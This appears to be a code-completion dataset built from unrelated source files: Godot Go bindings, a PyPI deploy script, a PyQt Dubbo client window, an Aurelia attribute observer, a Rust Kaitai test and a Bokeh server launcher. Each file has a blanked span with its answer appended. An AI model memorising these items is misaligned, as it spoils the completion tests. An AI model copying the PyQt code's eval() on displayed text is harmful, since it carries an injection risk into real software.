ErrUnavailable Error = 2 // < What is requested is unsupported/unavailable
ErrUnconfigured Error = 3 // < The object being used hasn't been properly set up yet
ErrUnauthorized Error = 4 // < Missing credentials for requested resource
ErrParameterRangeError Error = 5 // < Parameter given out of range (5)
ErrOutOfMemory Error = 6 // < Out of memory
ErrFileNotFound Error = 7
ErrFileBadDrive Error = 8
ErrFileBadPath Error = 9
ErrFileNoPermission Error = 10 // (10)
ErrFileAlreadyInUse Error = 11
ErrFileCantOpen Error = 12
ErrFileCantWrite Error = 13
ErrFileCantRead Error = 14
ErrFileUnrecognized Error = 15 // (15)
ErrFileCorrupt Error = 16
ErrFileMissingDependencies Error = 17
ErrFileEof Error = 18
ErrCantOpen Error = 19 // < Can't open a resource/socket/file
ErrCantCreate Error = 20 // (20)
ErrQueryFailed Error = 21
ErrAlreadyInUse Error = 22
ErrLocked Error = 23 // < resource is locked
ErrTimeout Error = 24
ErrCantConnect Error = 25 // (25)
ErrCantResolve Error = 26
ErrConnectionError Error = 27
ErrCantAcquireResource Error = 28
ErrCantFork Error = 29
ErrInvalidData Error = 30 // < Data passed is invalid (30)
ErrInvalidParameter Error = 31 // < Parameter passed is invalid
ErrAlreadyExists Error = 32 // < When adding, item already exists
	ErrDoesNotExist Error = 33 // < When retrieving/erasing, the item does not exist
	ErrDatabaseCantRead Error = 34 // < database can't be read
ErrDatabaseCantWrite Error = 35 // < database is full (35)
ErrCompilationFailed Error = 36
ErrMethodNotFound Error = 37
ErrLinkFailed Error = 38
ErrScriptFailed Error = 39
ErrCyclicLink Error = 40 // (40)
ErrInvalidDeclaration Error = 41
ErrDuplicateSymbol Error = 42
ErrParseError Error = 43
ErrBusy Error = 44
ErrSkip Error = 45 // (45)
ErrHelp Error = 46 // < user requested help!!
ErrBug Error = 47 // < a bug in the software certainly happened, due to a double check failing or unexpected behavior.
ErrPrinterOnFire Error = 48 // the parallel port printer is engulfed in flames
)
// ErrorLookupMap is a string-based lookup table of constants for Error.
var ErrorLookupMap = map[string]Error{
"Ok": Ok,
"Failed": Failed,
"ErrUnavailable": ErrUnavailable,
"ErrUnconfigured": ErrUnconfigured,
"ErrUnauthorized": ErrUnauthorized,
"ErrParameterRangeError": ErrParameterRangeError,
"ErrOutOfMemory": ErrOutOfMemory,
"ErrFileNotFound": ErrFileNotFound,
"ErrFileBadDrive": ErrFileBadDrive,
"ErrFileBadPath": ErrFileBadPath,
"ErrFileNoPermission": ErrFileNoPermission,
"ErrFileAlreadyInUse": ErrFileAlreadyInUse,
"ErrFileCantOpen": ErrFileCantOpen,
"ErrFileCantWrite": ErrFileCantWrite,
"ErrFileCantRead": ErrFileCantRead,
"ErrFileUnrecognized": ErrFileUnrecognized,
"ErrFileCorrupt": ErrFileCorrupt,
"ErrFileMissingDependencies": ErrFileMissingDependencies,
"ErrFileEof": ErrFileEof,
"ErrCantOpen": ErrCantOpen,
"ErrCantCreate": ErrCantCreate,
"ErrQueryFailed": ErrQueryFailed,
"ErrAlreadyInUse": ErrAlreadyInUse,
"ErrLocked": ErrLocked,
"ErrTimeout": ErrTimeout,
"ErrCantConnect": ErrCantConnect,
"ErrCantResolve": ErrCantResolve,
"ErrConnectionError": ErrConnectionError,
"ErrCantAcquireResource": ErrCantAcquireResource,
"ErrCantFork": ErrCantFork,
"ErrInvalidData": ErrInvalidData,
"ErrInvalidParameter": ErrInvalidParameter,
"ErrAlreadyExists": ErrAlreadyExists,
"ErrDoesNotExist": ErrDoesNotExist,
"ErrDatabaseCantRead": ErrDatabaseCantRead,
"ErrDatabaseCantWrite": ErrDatabaseCantWrite,
"ErrCompilationFailed": ErrCompilationFailed,
"ErrMethodNotFound": ErrMethodNotFound,
"ErrLinkFailed": ErrLinkFailed,
"ErrScriptFailed": ErrScriptFailed,
"ErrCyclicLink": ErrCyclicLink,
"ErrInvalidDeclaration": ErrInvalidDeclaration,
"ErrDuplicateSymbol": ErrDuplicateSymbol,
"ErrParseError": ErrParseError,
"ErrBusy": ErrBusy,
"ErrSkip": ErrSkip,
"ErrHelp": ErrHelp,
"ErrBug": ErrBug,
"ErrPrinterOnFire": ErrPrinterOnFire,
}
// NewEmptyBool will return a pointer to an empty
// initialized Bool. This is primarily used in
// conjunction with MethodBindPtrCall.
func NewEmptyBool() Pointer {
var obj C.godot_bool
return Pointer{base: unsafe.Pointer(&obj)}
}
// NewPointerFromBool will return an unsafe pointer to the given
// object. This is primarily used in conjunction with MethodBindPtrCall.
func NewPointerFromBool(obj Bool) Pointer {
base := obj.getBase()
return Pointer{base: unsafe.Pointer(&base)}
}
// NewBoolFromPointer will return a Bool from the
// given unsafe pointer. This is primarily used in conjunction with MethodBindPtrCall.
func NewBoolFromPointer(ptr Pointer) Bool {
base := ptr.getBase()
return Bool(*(*C.godot_bool)(base))
}
// Bool is a Go wrapper for the base C.godot_bool type
type Bool bool
func (t Bool) getBase() C.godot_bool {
return C.godot_bool(t)
}
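// NOTE: a hedged sketch of how the three helpers above pair up around a
// MethodBindPtrCall-style invocation; the call in the middle is illustrative
// only, not a function defined in this file:
//
//	arg := NewPointerFromBool(Bool(true)) // wrap an argument for the C side
//	ret := NewEmptyBool()                 // reserve space for the return value
//	// ... pass []Pointer{arg} and ret to the bound method ...
//	out := NewBoolFromPointer(ret)        // read the result back as a Bool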
// NewEmptyInt will return a pointer to an empty
// initialized Int. This is primarily used in
// conjunction with MethodBindPtrCall.
func NewEmptyInt() Pointer {
var obj C.godot_int
return Pointer{base: unsafe.Pointer(&obj)}
}
// NewPointerFromInt will return an unsafe pointer to the given
// object. This is primarily used in conjunction with MethodBindPtrCall.
func NewPointerFromInt(obj Int) Pointer {
base := obj.getBase()
return Pointer{base: unsafe.Pointer(&base)}
}
// NewIntFromPointer will return a Int from the
// given unsafe pointer. This is primarily used in conjunction with MethodBindPtrCall.
func NewIntFromPointer(ptr Pointer) Int {
base := ptr.getBase()
return Int(*(*C.godot_int)(base))
}
// Int is a Go wrapper for the base C.godot_int type
type Int int
func (t Int) getBase() C.godot_int {
return C.godot_int(t)
}
// NewEmptyReal will return a pointer to an empty
// initialized Real. This is primarily used in
// conjunction with MethodBindPtrCall.
func NewEmptyReal() Pointer {
var obj C.godot_real
return Pointer{base: unsafe.Pointer(&obj)}
}
// NewPointerFromReal will return an unsafe pointer to the given
// object. This is primarily used in conjunction with MethodBindPtrCall.
func NewPointerFromReal(obj Real) Pointer {
base := obj.getBase()
return Pointer{base: unsafe.Pointer(&base)}
}
// NewRealFromPointer will return a Real from the
// given unsafe pointer. This is primarily used in conjunction with MethodBindPtrCall.
func NewRealFromPointer(ptr Pointer) Real {
base := ptr.getBase()
return Real(*(*C.godot_real)(base))
}
// Real is a Go wrapper for the base C.godot_real type
type Real float64
func (t Real) getBase() C.godot_real {
return C.godot_real(t)
}
// NewEmptyObject will return a pointer to an empty
// initialized Object. This is primarily used in
// conjunction with MethodBindPtrCall.
func NewEmptyObject() Pointer {
var obj C.godot_object
return Pointer{base: unsafe.Pointer(&obj)}
}
// NewPointerFromObject will return an unsafe pointer to the given
// object. This is primarily used in conjunction with MethodBindPtrCall.
func NewPointerFromObject(obj Object) Pointer {
return Pointer{base: unsafe.Pointer(obj.getBase())}
}
// NewObjectFromPointer will return a Object from the
// given unsafe pointer. This is primarily used in conjunction with MethodBindPtrCall.
func NewObjectFromPointer(ptr Pointer) Object {
obj := (**C.godot_object)(ptr.getBase())
return Object{base: *obj}
}
type Object struct {
base *C.godot_object
}
func (gdt Object) getBase() *C.godot_object {
return gdt.base
}
// NewEmptyMethodBind will return a pointer to an empty
// initialized MethodBind. This is primarily used in
// conjunction with MethodBindPtrCall.
func NewEmptyMethodBind() Pointer {
var obj C.godot_method_bind
return Pointer{base: unsafe.Pointer(&obj)}
}
// NewPointerFromMethodBind will return an unsafe pointer to the given
// object. This is primarily used in conjunction with MethodBindPtrCall.
func | (obj MethodBind) Pointer {
return Pointer{base: unsafe.Pointer(obj.getBase())}
}
// NewMethodBindFromPointer will return a MethodBind from the
// given unsafe pointer. This is primarily used in conjunction with MethodBindPtrCall.
func NewMethodBindFromPointer(ptr Pointer) MethodBind {
return MethodBind{base: (*C.godot_method_bind)(ptr.getBase())}
}
type MethodBind struct {
base *C.godot_method_bind
}
func (gdt MethodBind) getBase() *C.godot_method_bind {
return gdt.base
}
// NewEmptyGdnativeApiVersion will return a pointer to an empty
// initialized GdnativeApiVersion. This is primarily used in
// conjunction with MethodBindPtrCall.
func NewEmptyGdnativeApiVersion() Pointer {
var obj C.godot_gdnative_api_version
return Pointer{base: unsafe.Pointer(&obj)}
}
// NewPointerFromGdnativeApiVersion will return an unsafe pointer to the given
// object. This is primarily used in conjunction with MethodBindPtrCall.
func NewPointerFromGdnativeApiVersion(obj GdnativeApiVersion) Pointer {
return Pointer{base: unsafe.Pointer(obj.getBase())}
}
// NewGdnativeApiVersionFromPointer will return a GdnativeApiVersion from the
// given unsafe pointer. This is primarily used in conjunction with MethodBindPtrCall.
func NewGdnativeApiVersionFromPointer(ptr Pointer) GdnativeApiVersion {
return GdnativeApiVersion{base: (*C.godot_gdnative_api_version)(ptr.getBase())}
}
type GdnativeApiVersion struct {
base *C.godot_gdnative_api_version
Major Uint
Minor Uint
}
func (gdt GdnativeApiVersion) getBase() *C.godot_gdnative_api_version {
return gdt.base
}
// NewEmptyGdnativeTerminateOptions will return a pointer to an empty
// initialized GdnativeTerminateOptions. This is primarily used in
// conjunction with MethodBindPtrCall.
func NewEmptyGdnativeTerminateOptions() Pointer {
var obj C.godot_gdnative_terminate_options
return Pointer{base: unsafe.Pointer(&obj)}
}
// NewPointerFromGdnativeTerminateOptions will return an unsafe pointer to the given
// object. This is primarily used in conjunction with MethodBindPtrCall.
func NewPointerFromGdnativeTerminateOptions(obj GdnativeTerminateOptions) Pointer {
return Pointer{base: unsafe.Pointer(obj.getBase())}
}
// NewGdnativeTerminateOptionsFromPointer will return a GdnativeTerminateOptions from the
// given unsafe pointer. This is primarily used in conjunction with MethodBindPtrCall.
func NewGdnativeTerminateOptionsFromPointer(ptr Pointer) GdnativeTerminateOptions {
return GdnativeTerminateOptions{base: (*C.godot_gdnative_terminate_options)(ptr.getBase())}
}
type GdnativeTerminateOptions struct {
base *C.godot_gdnative_terminate_options
InEditor Bool
}
func (gdt GdnativeTerminateOptions) getBase() *C.godot_gdnative_terminate_options {
return gdt.base
}
| NewPointerFromMethodBind |
prod.py | import subprocess
from config.directory import temp_builds
from .. import directory, output_release_file_checksum
def deploy_to_pypi() -> None:
directory.working.set_as_project_base_path()
subprocess.call(f"twine upload {temp_builds()}/*".split())
if __name__ == "__main__":
output_release_file_checksum() | deploy_to_pypi() | |
main_window.py | # -*- coding: utf-8 -*-
from PyQt5 import QtWidgets, QtCore
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QCursor
from PyQt5.QtWidgets import QVBoxLayout, QToolBar, QSplitter
from src.constant.conn_dialog_constant import ADD_CONN_MENU, EDIT_CONN_MENU
from src.constant.main_constant import LOCATION_BUTTON, TAB_ID_SEPARATOR, TREE_TOP_TEXT
from src.function.db.conn_sqlite import Connection
from src.ui.async_func.async_reopen_item import AsyncReopenManager
from src.ui.button.label_button import LabelButton
from src.ui.dialog.conn.conn_dialog import ConnDialog
from src.ui.func.common import keep_center, close_sqlite
from src.ui.func.menu_bar import fill_menu_bar
from src.ui.func.tool_bar import fill_tool_bar
from src.ui.func.tree import tree_node_factory, Context
from src.ui.tab.tab_bar import MyTabBar
from src.ui.tab.tab_widget import MyTabWidget
from src.ui.tree.my_tree import MyTreeWidget
_author_ = 'luwt'
_date_ = '2021/10/31 17:39'
class MainWindow(QtWidgets.QMainWindow):
def __init__(self, screen_rect):
super().__init__()
        # Resolution of the current screen
self.desktop_screen_rect = screen_rect
        # Create the main widget that holds all content
self.main_widget = QtWidgets.QWidget()
        # Layout inside the main widget
self.main_layout = QVBoxLayout()
        # Central widget
self.central_widget = QtWidgets.QWidget()
self.central_widget.setObjectName("central_widget")
        # The central widget uses a horizontal layout
self.horizontalLayout = QtWidgets.QHBoxLayout(self.central_widget)
self.horizontalLayout.setObjectName("horizontalLayout")
self.main_splitter = QSplitter()
self.main_splitter.setOrientation(Qt.Horizontal)
self.main_splitter.setObjectName("main_splitter")
self.horizontalLayout.addWidget(self.main_splitter)
self.horizontalLayout.setSpacing(0)
        # Frame for the tree structure on the left
self.tree_frame = QtWidgets.QFrame(self.main_splitter)
self.tree_frame.setObjectName("tree_frame")
self.tree_layout = QtWidgets.QVBoxLayout(self.tree_frame)
self.tree_layout.setObjectName("tree_layout")
self.tree_layout.setSpacing(0)
self.tree_layout.setContentsMargins(0, 0, 0, 0)
        # Toolbar at the top of the tree
self.tree_header_widget = QtWidgets.QWidget(self.tree_frame) | self.tree_layout.addWidget(self.tree_header_widget)
self.tree_header_layout = QtWidgets.QGridLayout(self.tree_header_widget)
        # Set the left, right and top margins to 0
self.tree_header_layout.setContentsMargins(0, 0, 0, self.tree_header_layout.contentsMargins().bottom())
        # Tree title
self.tree_tool_header = QtWidgets.QLabel(self.tree_header_widget)
self.tree_tool_header.setText(TREE_TOP_TEXT)
self.tree_header_layout.addWidget(self.tree_tool_header, 0, 0, 1, 8)
        # Locate button
self.tree_tool_location_button = LabelButton(self.tree_header_widget)
self.tree_tool_location_button.setObjectName("tree_tool_location_button")
        # Disabled by default
self.tree_tool_location_button.setEnabled(False)
self.tree_header_layout.addWidget(self.tree_tool_location_button, 0, 8, 1, 1)
        # Tree structure on the left
self.tree_widget = MyTreeWidget(self.tree_frame, self)
self.tree_widget.setObjectName("tree_widget")
self.tree_widget.headerItem().setHidden(True)
self.tree_layout.addWidget(self.tree_widget)
        # Frame for the tab area on the right
self.tab_frame = QtWidgets.QFrame(self.main_splitter)
self.tab_frame.setObjectName("tab_frame")
self.tab_layout = QtWidgets.QVBoxLayout(self.tab_frame)
self.tab_layout.setObjectName("tab_layout")
        # Tab area on the right
self.tab_widget = MyTabWidget(self.tab_frame, main_window=self)
self.tab_widget.setObjectName("tab_widget")
self.tab_bar = MyTabBar(self.tab_widget)
self.tab_bar.setObjectName("tab_bar")
self.tab_widget.setTabBar(self.tab_bar)
self.tab_layout.addWidget(self.tab_widget)
self.tab_layout.setSpacing(0)
self.tab_layout.setContentsMargins(0, 0, 0, 0)
        # Menu bar
self.menubar = QtWidgets.QMenuBar(self)
self.menubar.setObjectName("menubar")
self.setMenuBar(self.menubar)
        # Toolbar
self.toolBar = QToolBar(self)
self.toolBar.setObjectName("toolBar")
self.addToolBar(Qt.TopToolBarArea, self.toolBar)
        # Status bar
self.statusbar = QtWidgets.QStatusBar(self)
self.statusbar.setObjectName("statusbar")
self.setStatusBar(self.statusbar)
self._translate = QtCore.QCoreApplication.translate
self.reopen_manager = ...
self.setup_ui()
self.translate_ui()
self.bind_action()
def setup_ui(self):
self.setObjectName("MainWindow")
self.setWindowFlags(Qt.WindowTitleHint)
        # Compute the window size from the current screen resolution
self.resize(self.desktop_screen_rect.width() * 0.65, self.desktop_screen_rect.height() * 0.7)
        # Center the window
keep_center(self, self.desktop_screen_rect)
        # Set the spacing of all widgets to 0
self.main_layout.setSpacing(0)
self.main_layout.setContentsMargins(0, 0, 0, 0)
self.main_widget.setLayout(self.main_layout)
self.setCentralWidget(self.main_widget)
self.main_splitter.setStretchFactor(0, 2)
self.main_splitter.setStretchFactor(1, 9)
        # Populate the menu bar
fill_menu_bar(self)
        # Populate the toolbar
fill_tool_bar(self)
        # Show names under the icons (by default only icons are shown)
self.toolBar.setToolButtonStyle(Qt.ToolButtonTextUnderIcon)
self.main_layout.addWidget(self.central_widget)
def bind_action(self):
        # Asynchronously restore the working state from the last exit
self.reopen_manager = AsyncReopenManager(self, self.tree_widget, self.tab_widget)
self.reopen_manager.start()
        # Double-click event on tree nodes
self.tree_widget.doubleClicked.connect(self.get_tree_list)
        # Right-click event
self.tree_widget.setContextMenuPolicy(Qt.CustomContextMenu)
self.tree_widget.customContextMenuRequested.connect(self.right_click_menu)
        # Signals emitted when a tab is opened or all tabs are cleared
self.tab_widget.opened_tab_signal.connect(lambda: self.tree_tool_location_button.setEnabled(True))
self.tab_widget.clear_tabs_signal.connect(lambda: self.tree_tool_location_button.setEnabled(False))
        # Locate
self.tree_tool_location_button.clicked.connect(self.location_method)
def connect_rest_signal(self):
        # Clicking, expanding or collapsing a node should resize the columns to fit the content, keeping the horizontal scroll bar usable
self.tree_widget.doubleClicked.connect(self.handle_expanded_changed)
self.tree_widget.expanded.connect(self.handle_expanded_changed)
self.tree_widget.collapsed.connect(self.handle_expanded_changed)
def translate_ui(self):
self.setWindowTitle(self._translate("MainWindow", "Dubbo-test-client"))
self.tree_tool_location_button.setText(LOCATION_BUTTON)
    def add_conn(self):
        """Open the add-connection dialog"""
conn_info = Connection(*((None,) * len(Connection._fields)))
conn_dialog = ConnDialog(conn_info, ADD_CONN_MENU, self.geometry(), self.tree_widget)
conn_dialog.exec()
    def edit_conn(self, conn_info, tree_item):
        """Open the edit-connection dialog"""
conn_dialog = ConnDialog(conn_info, EDIT_CONN_MENU, self.geometry(), tree_item=tree_item)
conn_dialog.exec()
    def get_tree_list(self):
        """Fetch the tree's child nodes on double-click, reading connection -> service -> method in order"""
item = self.tree_widget.currentItem()
node = tree_node_factory(item)
Context(node).open_item(item, self)
def handle_expanded_changed(self, index):
        # Size the columns according to the current content
self.tree_widget.tree_column_resize()
item = self.tree_widget.itemFromIndex(index)
        # Method nodes have no expanded attribute and need no handling; watching conn and service nodes is enough
if item.parent() is None or item.parent().parent() is None:
expanded = self.tree_widget.itemFromIndex(index).isExpanded()
self.tree_widget.update_expanded(item.text(1), expanded, item)
def right_click_menu(self, pos):
"""
        Right-click menu: pops up a context menu on right click.
        :param pos: position of the right click
"""
        # Get the current item; the menu is only shown when over an item
item = self.tree_widget.itemAt(pos)
if item:
            # Build the context menu
menu = QtWidgets.QMenu()
node = tree_node_factory(item)
menu_names = Context(node).get_menu_names(item, self)
[menu.addAction(QtWidgets.QAction(option, menu)) for option in menu_names]
            # Click handler for the context menu actions
menu.triggered.connect(lambda action: Context(node).handle_menu_func(item, action.text(), self))
            # Pop the context menu up at the cursor position
menu.exec_(QCursor.pos())
def del_history(self):
item = self.tree_widget.currentItem()
node = tree_node_factory(item)
Context(node).del_history(item, self)
def location_method(self):
tab_id = self.tab_widget.currentWidget().property("tab_id")
        # Locate level by level based on how tab_id is built: split on the separator to get connection id, interface name and method name
self.tree_widget.tab_id_splits = tab_id.split(TAB_ID_SEPARATOR)
conn_id = self.tree_widget.tab_id_splits[0]
        # Iterate over the top-level items
for conn_idx in range(self.tree_widget.topLevelItemCount()):
conn_item = self.tree_widget.topLevelItem(conn_idx)
            # When the matching connection node is found, search it recursively
if int(conn_id) == eval(conn_item.text(2)).get("id"):
method_item = self.tree_widget.recursive_search_item(conn_item)
self.tree_widget.set_selected_focus(method_item)
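        # NOTE: a hedged sketch of the tab_id shape assumed above, with
        # TAB_ID_SEPARATOR written as '|' purely for illustration (the
        # values are made up):
        #   "12|com.foo.BarService|sayHello".split('|')
        #   -> ["12", "com.foo.BarService", "sayHello"]  # conn id, interface, method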
def close(self):
close_sqlite()
self.tab_widget.close()
super().close() | |
element-attribute-observer.ts | import {
DOM,
IBindingTargetObserver,
ILifecycle,
IObserverLocator,
ISubscriber,
ISubscriberCollection,
LifecycleFlags,
Priority,
subscriberCollection,
} from '@aurelia/runtime';
export interface IHtmlElement extends HTMLElement {
$mObserver: MutationObserver;
$eMObservers: Set<ElementMutationSubscription>;
}
export interface ElementMutationSubscription {
handleMutation(mutationRecords: MutationRecord[]): void;
}
export interface AttributeObserver extends
IBindingTargetObserver<IHtmlElement, string>,
ISubscriber,
ISubscriberCollection { }
/**
* Observer for handling two-way binding with attributes
 * Uses different strategies for class/style and for normal attributes
* TODO: handle SVG/attributes with namespace
*/
@subscriberCollection()
export class | implements AttributeObserver, ElementMutationSubscription {
public readonly lifecycle: ILifecycle;
public readonly observerLocator: IObserverLocator;
public readonly obj: IHtmlElement;
public readonly propertyKey: string;
public readonly targetAttribute: string;
public currentValue: unknown;
public oldValue: unknown;
public hasChanges: boolean;
public priority: Priority;
constructor(
lifecycle: ILifecycle,
observerLocator: IObserverLocator,
element: Element,
propertyKey: string,
targetAttribute: string,
) {
this.observerLocator = observerLocator;
this.lifecycle = lifecycle;
this.obj = element as IHtmlElement;
this.propertyKey = propertyKey;
this.targetAttribute = targetAttribute;
this.currentValue = null;
this.oldValue = null;
this.hasChanges = false;
this.priority = Priority.propagate;
}
public getValue(): unknown {
return this.currentValue;
}
public setValue(newValue: unknown, flags: LifecycleFlags): void {
this.currentValue = newValue;
this.hasChanges = newValue !== this.oldValue;
if ((flags & LifecycleFlags.fromBind) > 0) {
this.flushRAF(flags);
}
}
public flushRAF(flags: LifecycleFlags): void {
if (this.hasChanges) {
this.hasChanges = false;
const { currentValue } = this;
this.oldValue = currentValue;
switch (this.targetAttribute) {
case 'class': {
          // Why does the class attribute observer's setValue differ from the class attribute accessor's?
          // ==============
          // For the class list, newValue is simply checked for truthiness
          // and the class is toggled accordingly
          // -- a rule quite different from the one for a normal attribute.
          //
          // The class attribute observer only observes one particular class at a time;
          // this follows from the syntax, which is typically my-class.class="someProperty".
          //
          // So there is no need to split the value on spaces and add each class
          // the way the class accessor does.
if (!!currentValue) {
this.obj.classList.add(this.propertyKey);
} else {
this.obj.classList.remove(this.propertyKey);
}
break;
}
case 'style': {
let priority = '';
let newValue = currentValue as string;
if (typeof newValue === 'string' && newValue.includes('!important')) {
priority = 'important';
newValue = newValue.replace('!important', '');
}
this.obj.style.setProperty(this.propertyKey, newValue, priority);
}
}
}
}
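  // NOTE: hedged examples of the two special cases handled above, written in
  // Aurelia's attribute-binding syntax (the names and values are made up):
  //   my-class.class="isActive"        -> toggles only the "my-class" class
  //   text-align.style="alignExpr"     -> style.setProperty('text-align', ...)
  //   width.style="'100px !important'" -> '!important' becomes the priority argument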
public handleMutation(mutationRecords: MutationRecord[]): void {
let shouldProcess = false;
for (let i = 0, ii = mutationRecords.length; ii > i; ++i) {
const record = mutationRecords[i];
if (record.type === 'attributes' && record.attributeName === this.propertyKey) {
shouldProcess = true;
break;
}
}
if (shouldProcess) {
let newValue;
switch (this.targetAttribute) {
case 'class':
newValue = this.obj.classList.contains(this.propertyKey);
break;
case 'style':
newValue = this.obj.style.getPropertyValue(this.propertyKey);
break;
default:
throw new Error(`Unsupported targetAttribute: ${this.targetAttribute}`);
}
if (newValue !== this.currentValue) {
const { currentValue } = this;
this.currentValue = this.oldValue = newValue;
this.hasChanges = false;
this.callSubscribers(newValue, currentValue, LifecycleFlags.fromDOMEvent);
}
}
}
public subscribe(subscriber: ISubscriber): void {
if (!this.hasSubscribers()) {
this.currentValue = this.oldValue = this.obj.getAttribute(this.propertyKey);
startObservation(this.obj, this);
}
this.addSubscriber(subscriber);
}
public unsubscribe(subscriber: ISubscriber): void {
this.removeSubscriber(subscriber);
if (!this.hasSubscribers()) {
stopObservation(this.obj, this);
}
}
public bind(flags: LifecycleFlags): void {
this.lifecycle.enqueueRAF(this.flushRAF, this, this.priority);
}
public unbind(flags: LifecycleFlags): void {
this.lifecycle.dequeueRAF(this.flushRAF, this);
}
}
const startObservation = (element: IHtmlElement, subscription: ElementMutationSubscription): void => {
if (element.$eMObservers === undefined) {
element.$eMObservers = new Set();
}
if (element.$mObserver === undefined) {
element.$mObserver = DOM.createNodeObserver!(
element,
// @ts-ignore
handleMutation,
{ attributes: true }
) as MutationObserver;
}
element.$eMObservers.add(subscription);
};
const stopObservation = (element: IHtmlElement, subscription: ElementMutationSubscription): boolean => {
const $eMObservers = element.$eMObservers;
if ($eMObservers.delete(subscription)) {
if ($eMObservers.size === 0) {
element.$mObserver.disconnect();
element.$mObserver = undefined!;
}
return true;
}
return false;
};
const handleMutation = (mutationRecords: MutationRecord[]): void => {
(mutationRecords[0].target as IHtmlElement).$eMObservers.forEach(invokeHandleMutation, mutationRecords);
};
function invokeHandleMutation(this: MutationRecord[], s: ElementMutationSubscription): void {
s.handleMutation(this);
}
| AttributeObserver |
test_nested_types.rs | // Autogenerated from KST: please remove this line if doing any edits by hand!
extern crate kaitai_struct;
extern crate rust;
use kaitai_struct::KaitaiStruct;
use rust::NestedTypes;
#[test]
fn | () {
if let Ok(r) = NestedTypes::from_file("src/fixed_struct.bin") {
assert_eq!(r.one.typed_at_root.value_b, 80);
assert_eq!(r.one.typed_here.value_c, 65);
assert_eq!(r.two.value_b, 67);
}
}
| test_nested_types |
main.py | """Command line wrapper to serve one or more named Bokeh scripts or folders."""
import logging
import os
import re
import pathlib
import tempfile
from typing import Any, Dict, Tuple
import bokeh.server.views
import click
from bokeh.application.application import Application
from bokeh.command.util import build_single_handler_application
from bokeh.server.server import Server as _BkServer
from bokeh.server.views.root_handler import RootHandler
from .readycheck import create_ready_app
FORMAT = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logging.basicConfig(format=FORMAT)
root_logger = logging.getLogger()
root_logger.setLevel(logging.INFO)
logger = logging.getLogger('bokeh_root_cmd')
class BokehServer:
def __init__(self, prefix=''):
self.prefix = prefix
if self.prefix != '':
self.html_file = None
def __del__(self):
if self.prefix != '' and self.html_file is not None:
self.html_file.close()
def _get_default_index_html(self):
return str(pathlib.Path(bokeh.server.views.__file__).parent / "app_index.html")
def _get_index_html(self):
"""
Where there is a prefix (e.g. /user/dan/dash-test) supplied, Bokeh/Panel's server doesn't work for us.
It doesn't distinguish between server-side and client-side URLs.
We want it to serve sub-apps at the URL /PanelNotebook
(so accessible at /user/dan/dash-test/PanelNotebook behind the cdsdashboards reverse proxy)
but for URLs on the index page to point the browser to /user/dan/dash-test/PanelNotebook.
Setting prefix in Bokeh results in correct client-side behavior, but unhelpfully also
serves at the prefix (So, combined with cdsdashboards reverse proxy it is only accessible at
/user/dan/dash-test/user/dan/dash-test/PanelNotebook).
"""
if hasattr(self, 'html_file'):
if self.html_file is None:
self.html_file = tempfile.NamedTemporaryFile("wt", suffix='.html')
with open(self._get_default_index_html(), "rt") as f:
for r in f.readlines():
r = re.sub(r'\{\{\s*prefix\s*\}\}', self.prefix, r)
self.html_file.write(r)
self.html_file.flush()
return self.html_file.name
return self._get_default_index_html()
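    # NOTE: a hedged illustration of the rewrite above -- when a prefix is set,
    # every "{{ prefix }}" placeholder in the index template is replaced with
    # the configured prefix before serving (the href below is made up):
    #   <a href="{{ prefix }}/PanelNotebook">
    #   -> <a href="/user/dan/dash-test/PanelNotebook">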
@staticmethod
def _get_server_class():
return _BkServer
@staticmethod
def _make_app(command: str, url: str = "/", debug: bool = False) -> Application:
cwd_original = os.getcwd()
# Command can be absolute, or could be relative to cwd
app_py_path = os.path.join(os.getcwd(), command)
if os.path.isdir(app_py_path):
dirname = app_py_path
else:
dirname = os.path.dirname(app_py_path)
        if app_py_path == dirname:
logger.debug("Fetching folder {}".format(app_py_path))
else:
logger.debug("Fetching script {}".format(app_py_path))
if os.path.isdir(dirname):
logger.debug("Changing working dir to {}".format(dirname))
os.chdir(dirname)
app = build_single_handler_application(app_py_path, [url])
os.chdir(cwd_original)
logger.debug("Changing working dir back to {}".format(cwd_original))
return app
@classmethod
def _is_single_app(cls, cmd: str):
"""
Return True if the path specified in `cmd` is exactly one app: either a single py/ipynb file
or a folder containing a main.py or main.ipynb file.
"""
cmd_path = pathlib.Path(cmd)
return cmd_path.is_file() or (cmd_path / "main.py").is_file() or (cmd_path / "main.ipynb").is_file()
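    # NOTE: hedged examples of the rule above (the paths are made up):
    #   _is_single_app("dash.py")    -> True, a single script
    #   _is_single_app("apps/myapp") -> True iff apps/myapp/main.py or main.ipynb exists
    # Anything else is treated as a folder of independent apps, which
    # _get_applications below expands via *.py / *.ipynb globbing.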
@classmethod
def _get_applications(cls, command: Tuple[str], debug=False) -> Dict[str, Application]:
if len(command) == 1 and cls._is_single_app(command[0]):
            return {"/": cls._make_app(command[0], debug=debug)}
apps = {}
for cmd in command:
if cls._is_single_app(cmd):
cmds = [cmd]
else:
cmd_path = pathlib.Path(cmd)
cmds = list(cmd_path.glob("*.ipynb")) + list(cmd_path.glob("*.py"))
for singlecmd in cmds:
                application = cls._make_app(singlecmd, debug=debug)
route = application.handlers[0].url_path()
apps[route] = application
return apps
def _get_server_kwargs(self, port, ip, allow_websocket_origin, is_single_app) -> Dict[str, Any]:
server_kwargs = {"port": port, "ip": ip}
if allow_websocket_origin:
server_kwargs["allow_websocket_origin"] = list(allow_websocket_origin)
if not is_single_app:
index_html = self._get_index_html()
logger.debug("Using HTML template %s", index_html)
server_kwargs.update(
{"use_index": True, "redirect_root": True, "index": index_html}
)
return server_kwargs
def run(self, port, ip, debug, allow_websocket_origin, prefix, command):
logger.info("Starting %s", type(self).__name__)
if debug:
root_logger.setLevel(logging.DEBUG)
logger.debug("ip = %s", ip)
logger.debug("port = %s", port)
logger.debug("debug = %s", debug)
logger.debug("allow_websocket_origin = %s", allow_websocket_origin)
logger.debug("prefix = %s", prefix)
logger.debug("command = %s", command)
applications = self._get_applications(command, debug)
applications["/ready-check"] = create_ready_app()
logger.debug("applications = %s", list(applications.keys()))
server_kwargs = self._get_server_kwargs(port, ip, allow_websocket_origin, len(applications) <= 2)
if debug:
            server_kwargs["log_level"] = "debug"
            server_kwargs["log_format"] = FORMAT
logger.debug("server_kwargs = %s", server_kwargs)
server = self._get_server_class()(applications, **server_kwargs)
server.run_until_shutdown()
class PanelServer(BokehServer):
@staticmethod
def _get_server_class():
|
def _get_default_index_html(self):
from panel.io.server import INDEX_HTML as _PANEL_INDEX_HTML
return _PANEL_INDEX_HTML
@click.command()
@click.option("--port", default=8888, type=click.INT, help="port for the proxy server to listen on")
